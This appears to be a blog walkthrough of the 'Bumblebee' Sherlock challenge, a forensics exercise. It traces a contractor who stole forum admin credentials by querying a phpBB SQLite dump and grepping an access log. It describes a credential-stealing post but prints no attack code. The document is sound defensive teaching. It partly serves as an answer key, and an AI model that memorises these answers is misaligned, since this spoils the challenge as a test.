In this post, I would like to share some walkthroughs on the Sherlock Challenges such as Bumblebee which is considered an Easy difficulty
- Introduction of Bumblebee Challenge
- Case Scenario on the Bumblebee
- 1) What was the username of the external contractor?
- 2) What IP address did the contractor use to create their account?
- 3) What is the post_id of the malicious post that the contractor made?
- 4) What is the full URI that the credential stealer sends its data to?
- 5) When did the contractor log into the forum as the administrator? (UTC)
- 6) In the forum there are plaintext credentials for the LDAP connection, what is the password?
- 7) What is the user agent of the Administrator user?
- 8) What time did the contractor add themselves to the Administrator group? (UTC)
- 9) What time did the contractor download the database backup? (UTC)
- 10) What was the size in bytes of the database backup as stated by access.log?
Introduction of Bumblebee Challenge
In this challenge, you will take on the role of a Digital Forensics and Incident Response (DFIR) specialist investigating a security breach involving an external contractor who accessed Forela’s internal forum. Analyzing forum logs and an SQLite3 database dump, your task is to uncover how the intruder exploited the Guest’s WiFi to obtain administrative credentials. This exercise assesses your skills in forensic data analysis, tracking digital footprints, and identifying the perpetrator.
Case Scenario on the Bumblebee
An external contractor has accessed the internal forum here at Forela via the Guest WiFi and they appear to have stolen credentials for the administrative user! We have attached some logs from the forum and a full database dump in sqlite3 format to help you in your investigation.
Firstly, we are required to download the bumblebee file into our machine.
Inside the zip file, there are only two files where we can analyze it to retrieve the answer to the challenge.
Therefore, let’s access the database by executing the command sqlite3 <file>
There are a lot of tables inside the database so it will take a lot of time to analyze it.
1) What was the username of the external contractor?
To proceed further, we need to determine the schema that has been used on the database.
To answer this question, we will need to select the username from the tables by typing the command “select username, user_ip from phpbb_users“. However, it might look hard to read this format.
Therefore, we need to download and install one application which it easy for us to read the details or information. After a while, we will install the sqlitebrowser by typing the command below:
sudo apt install sqlitebrowser
Sqlitebrowser interface
We can start the application and upload the database on the application. As a result, we should be getting the interface as shown below
At last, we managed to obtain the username has highlighted above.
2) What IP address did the contractor use to create their account?
Aside from the username as required in Question 1, we also found the User IP highlighted above.
3) What is the post_id of the malicious post that the contractor made?
While analyzing the database like phpbb_posts, we managed to identify the post_id which is 9
4) What is the full URI that the credential stealer sends its data to?
Under the post_text, we can see the data cell which looks like an HTML page.
When analyzing the HTML source code carefully, we should be able to notice one URL that stands which is highlighted above.
5) When did the contractor log into the forum as the administrator? (UTC)
For this Question, we will analyze access.log which might contain the answer that we are looking for.
There are a lot of log details that will take time to read and analyze properly.
We can filter the log by running the command such as “cat access.log | grep “admin”“
6) In the forum there are plaintext credentials for the LDAP connection, what is the password?
Let’s analyze the phpbb_config in order to retrieve the answer this question.
We are required to look carefully at the information.
Finally, we have successfully noticed the password for the LDAP
7) What is the user agent of the Administrator user?
We should be aware of the browser agent while analyzing the output from the previous command
8) What time did the contractor add themselves to the Administrator group? (UTC)
This time, we need to modify the command shown in the screenshot above
9) What time did the contractor download the database backup? (UTC)
As we might be aware, the backup is normally saved using the format <filename>.sql.gz which we can analyze further on the same line as the backup file name
10) What was the size in bytes of the database backup as stated by access.log?
If we look carefully on the log that mentioned the backup filename, there is also mentioned the file size of the backup
No responses yet